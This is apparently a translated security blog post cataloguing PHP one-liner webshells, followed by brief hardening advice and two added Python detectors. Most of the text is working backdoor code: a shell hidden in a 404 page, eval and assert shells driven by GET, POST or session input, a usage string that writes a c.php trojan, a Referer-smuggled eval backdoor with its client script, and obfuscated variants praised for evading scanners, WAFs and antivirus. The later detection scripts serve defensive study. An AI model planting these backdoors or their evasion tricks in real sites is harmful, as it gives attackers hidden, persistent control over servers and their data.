Powerful PHP one-liner backdoors
These backdoors are a headache for website owners and server administrators: they are forced to keep changing their detection methods, while new ways of writing the backdoors keep appearing that the common detection methods cannot find or handle.
Today we go through some interesting PHP one-liner trojans.
1. Using a 404 page to hide a small PHP shell:
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL is not found on this server.</p>
    </body></html>
    <?php
    @preg_replace("/[pageerror]/e", $_POST['error'], "saft");
    header('HTTP/1.1 404 Not Found');
    ?>
404 pages are part of every web site, and once the site is live very few people go back and check them for changes, so we can use one to hide the backdoor.
2. A PHP one-liner with no signature:
    <?php
    session_start();
    $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
    $_SESSION['theCode'] && preg_replace('\'a\'eis', 'e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))', 'a');
    ?>
The contents of $_POST['code'] are assigned to $_SESSION['theCode'], and $_SESSION['theCode'] is then executed; the highlight is that there is no signature.
Checking the code with a scanning tool raises no alarm, which is exactly the goal.
3. Super-hidden PHP backdoor:
    <?php $_GET['a']($_GET['b']); ?>
The trojan is built entirely from the GET function;
How to use it:
    a=assert&b=${fputs%28fopen%28base64_decode%28yy5waha%29,w%29,base64_decode%28pd9wahagqgv2ywwojf9qt1nuw2ndktsgpz4x%29%29};
After execution, a trojan named c.php is generated in the current directory. When parameter a is eval an error is raised and the trojan is not generated; with assert the same error appears, but the trojan is still generated. This really cannot be underestimated: one simple line, extended into this kind of application.
A PHP backdoor that runs code carried in the HTTP request (the Referer header):
This method uses two files. File 1:
    <?php
    // 1.php
    header('Content-Type:text/html;charset=utf-8');
    parse_str($_SERVER['HTTP_REFERER'], $a);
    if (reset($a) == '10' && count($a) == 9) {
        eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
    }
    ?>
File 2:
    <?php
    // 2.php
    header('Content-Type:text/html;charset=utf-8');
    // the code to execute
    $code = <<<CODE
    phpinfo();
    CODE;
    // base64-encode it
    $code = base64_encode($code);
    // construct the Referer string
    $referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
    // backdoor URL
    $url = 'http://localhost/test1/1.php';
    $ch = curl_init();
    $options = array(
        CURLOPT_URL => $url,
        CURLOPT_HEADER => FALSE,
        CURLOPT_RETURNTRANSFER => TRUE,
        CURLOPT_REFERER => $referer
    );
    curl_setopt_array($ch, $options);
    echo curl_exec($ch);
    ?>
The base64-encoded code travels in the HTTP_REFERER of the request, which gives the backdoor effect; most WAFs inspect the Referer rather loosely, or not at all.
This idea works well for bypassing a WAF.
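On the defending side, the request above leaves a distinctive trace: a Referer that is a bare query string rather than a URL, with one value that is base64-encoded code. The following is an added example (my code, not from the original post) that finds such lines in constructed Apache combined-log entries; the log lines, IP addresses and timestamps are made up for the example.

```python
import re
import base64
from urllib.parse import parse_qsl, urlparse

# Constructed Apache combined-log lines: two ordinary page views and one request
# whose Referer is the bare query string that 2.php above sends to 1.php.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "http://example.test/" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /test1/1.php HTTP/1.1" 200 0 "a=10&b=ab&c=34&d=re&e=32&f=km&g=cGhwaW5mbygpOw==&h=&i=" "curl/7.88.1"
10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /page.php?id=3 HTTP/1.1" 200 2048 "http://example.test/index.php" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'"(?P<request>[^"]*)" \d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')
B64_RE = re.compile(r'^[A-Za-z0-9+/ ]{8,}={0,2}$')   # a space may be a '+' mangled by URL decoding

def suspicious_referer(referer):
    """Return a reason if the Referer is a smuggled parameter block, else None."""
    if not referer or referer == "-" or urlparse(referer).scheme in ("http", "https"):
        return None                       # absent, or a normal page URL
    pairs = parse_qsl(referer, keep_blank_values=True)
    if len(pairs) < 2:
        return None                       # not query-string shaped
    for key, value in pairs:
        candidate = value.replace(" ", "+")   # the same repair 1.php does before decoding
        if not B64_RE.match(candidate):
            continue
        try:
            decoded = base64.b64decode(candidate, validate=True).decode("utf-8", "replace")
        except ValueError:
            continue
        if "(" in decoded or "$" in decoded:  # reads like code rather than an opaque token
            return f"query-string Referer with {len(pairs)} params; {key}= decodes to {decoded!r}"
    return f"query-string Referer with {len(pairs)} params"

def scan_log(text):
    """Return (request line, reason) for every log line with a suspicious Referer."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        reason = suspicious_referer(m.group("referer")) if m else None
        if reason:
            hits.append((m.group("request"), reason))
    return hits
```

The base64 value in the constructed log line is exactly what 2.php produces for `phpinfo();`, so the hit shows the decoded payload next to the request that carried it.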
4. PHP backdoor generation tool: weevely
Weevely is free software for PHP webshells that can simulate a telnet-like connection shell. It is often used in web application exploitation, for hiding backdoors, or for managing a server through a telnet-like interface instead of a web page. The server-side PHP code weevely generates is Base64 encoded, so it can fool mainstream anti-virus software and IDS; once the server-side code is uploaded it can usually be run directly through weevely.
The backdoor method weevely generates uses the now mainstream technique of base64 encoding combined with string deformation. The functions used in the backdoor are ordinary string-processing functions, so functions such as eval and system, which serve as the detection rules, never appear directly in the code, and the backdoor file slips past backdoor-lookup tools. Scanning it with Dark Group's web backdoor scanner reports the file as free of any threat.
The above is only an introduction; how to use the tool is not covered here. Just a quick primer.
5. Three variants of the PHP one-liner trojan
The first:
    <?php ($_=@$_GET[2]).@$_($_POST[1])?>
Enter http://site/1.php?2=assert in the chopper; the password is 1.
The second:
    <?php
    $_="";
    $_[+""]='_';
    $_="$_"."";
    $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
    ?>
    <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
(The string literals in this variant contain non-printable characters that do not survive copy-and-paste; the quotes above show where they sit.)
Enter http://site/2.php?_=assert&__=eval($_POST['pass']) in the chopper; the password is pass.
Using the chopper's additional-data field is more covert, and other injection tools work as well, because the data is submitted by POST.
The third:
    ($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e', '@'.str_rot13('riny').'($b4dboy)', 'add');
str_rot13('riny') is eval in encoded form: the keyword is avoided completely without losing any of the effect. Enough to make people cough blood!
6. Finally, several advanced PHP one-liner backdoors:
1.
    $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
    $hh("/[discuz]/e", $_POST['h'], "Access");
Chopper one-liner
2.
    $filename = $_GET['xbid'];
    include($filename);
The dangerous include function: it compiles and runs any file as PHP
3.
    $reg = "c"."o"."p"."y";
    $reg($_FILES['MyFile']['tmp_name'], $_FILES['MyFile']['name']);
Renames any file
4.
    $gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
    $gzid("/[discuz]/e", $_POST['h'], "Access");
Chopper one-liner
5.
    include($uid);
The dangerous include function: it compiles and runs any file as PHP. POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
with a one-liner inserted into the GIF.
In summary, these PHP one-liner backdoors are small but complete, and you may well fall for one without noticing. But where is the real weight of this article? The focus is on the summary below!
How to deal with PHP one-liner backdoors:
We stress a few key points; anyone who has read this far is no layman, so I will not be long-winded:
- Pay attention to secure PHP programming
- Check server log files often, and back them up often
- Assign strict permissions for each site
- Regularly carry out batch security reviews of dynamic files and directories
- Learn how to scan manually, that is, to judge by behaviour
- Keep paying attention, or get involved in an active cyber security community
- Handle server environments in layers; even a single function can be given a rule
We believe that when you manage many sites and large amounts of data you should make reasonable use of auxiliary tools, but you should not rely on them entirely: technology keeps moving forward, and the most important thing is to learn and understand the thinking of the people who write these powerful backdoors. Putting yourself in their position will bring you greater progress.
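As an added example of the "batch security review of dynamic files" point (my code, not the post's), the script below shows why a review tool has to normalise before it matches: it undoes the cheap tricks catalogued above (str_rot13 literals, spliced "p"."r"."e" strings, a function name parked in a variable) and only then applies rules such as preg_replace with the /e modifier, so the spliced preg_replace variant is caught even though the name never appears literally. The PHP samples are constructed from the snippets in this post, with one benign file for comparison.

```python
import re
import codecs

# PHP samples constructed from the shapes catalogued in this post, plus one benign file.
SAMPLES = {
    "404_page": r'''<?php @preg_replace("/[pageerror]/e", $_POST['error'], "saft"); header('HTTP/1.1 404 Not Found'); ?>''',
    "get_pair": r'''<?php $_GET['a']($_GET['b']); ?>''',
    "spliced": r'''<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e", $_POST['h'], "Access"); ?>''',
    "rot13": r'''<?php ($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e', '@'.str_rot13('riny').'($b4dboy)', 'add'); ?>''',
    "referer": r'''<?php parse_str($_SERVER['HTTP_REFERER'], $a); if (count($a) == 9) { eval(base64_decode(implode(array_slice($a, 6)))); } ?>''',
    "clean": r'''<?php $name = htmlspecialchars($_GET['name'] ?? ''); echo "Hello $name"; ?>''',
}

RULES = {  # each rule targets one trick from the post
    "superglobal_call": r'\$_(GET|POST|REQUEST|COOKIE|SESSION)\s*\[[^\]]*\]\s*\(',
    "variable_call_with_input": r'\$\w+\s*\([^;]*\$_(GET|POST|REQUEST|COOKIE|FILES|SESSION)',
    "spliced_name": r'(["\'][A-Za-z_]["\']\s*\.\s*){3,}',
    "hidden_keyword": r'["\'](eval|assert|system|passthru|shell_exec)["\']',
    "dynamic_include": r'\b(include|require)(_once)?\s*\(?\s*\$\w+',
    "referer_parse": r'parse_str\s*\(\s*\$_SERVER\s*\[\s*["\']HTTP_',
    "decode_into_eval": r'\b(eval|assert)\s*\(\s*(base64_decode|str_rot13|gzinflate|gzuncompress)\s*\(',
}
PREG_FIRST_ARG = re.compile(r'preg_replace\s*\(\s*(["\'])((?:\\.|(?!\1).)*)\1')
E_MODIFIER = re.compile(r'[^A-Za-z0-9\s\\][A-Za-z]*e[A-Za-z]*$')  # closing delimiter, then modifiers containing e

def normalize(src):
    """Undo the cheap obfuscations so the rules see the real function names."""
    # str_rot13('riny') -> 'eval'
    src = re.sub(r"str_rot13\s*\(\s*(['\"])(\w+)\1\s*\)",
                 lambda m: m.group(1) + codecs.decode(m.group(2), "rot_13") + m.group(1), src)
    prev = None
    while prev != src:  # "p"."r"."e"."g" -> "preg", repeated until nothing is left to merge
        prev, src = src, re.sub(r'(["\'])([A-Za-z_]+)\1\s*\.\s*\1([A-Za-z_]+)\1', r'\1\2\3\1', src)
    # $hh = "preg_replace"; ... $hh(...)  ->  preg_replace(...)
    for var, name in re.findall(r'\$(\w+)\s*=\s*["\'](\w+)["\']\s*;', src):
        src = re.sub(r'\$' + re.escape(var) + r'\s*\(', name + '(', src)
    return src

def scan(src):
    """Return the names of the rules that fire on the raw or the normalized source."""
    hits = set()
    for text in (src, normalize(src)):
        hits.update(name for name, pat in RULES.items() if re.search(pat, text))
        if any(E_MODIFIER.search(m.group(2)) for m in PREG_FIRST_ARG.finditer(text)):
            hits.add("preg_replace_e")
    return hits
```

Running scan() over each sample flags every backdoor shape from the post and nothing on the benign file; on a real tree you would walk the .php files and apply the same function to each.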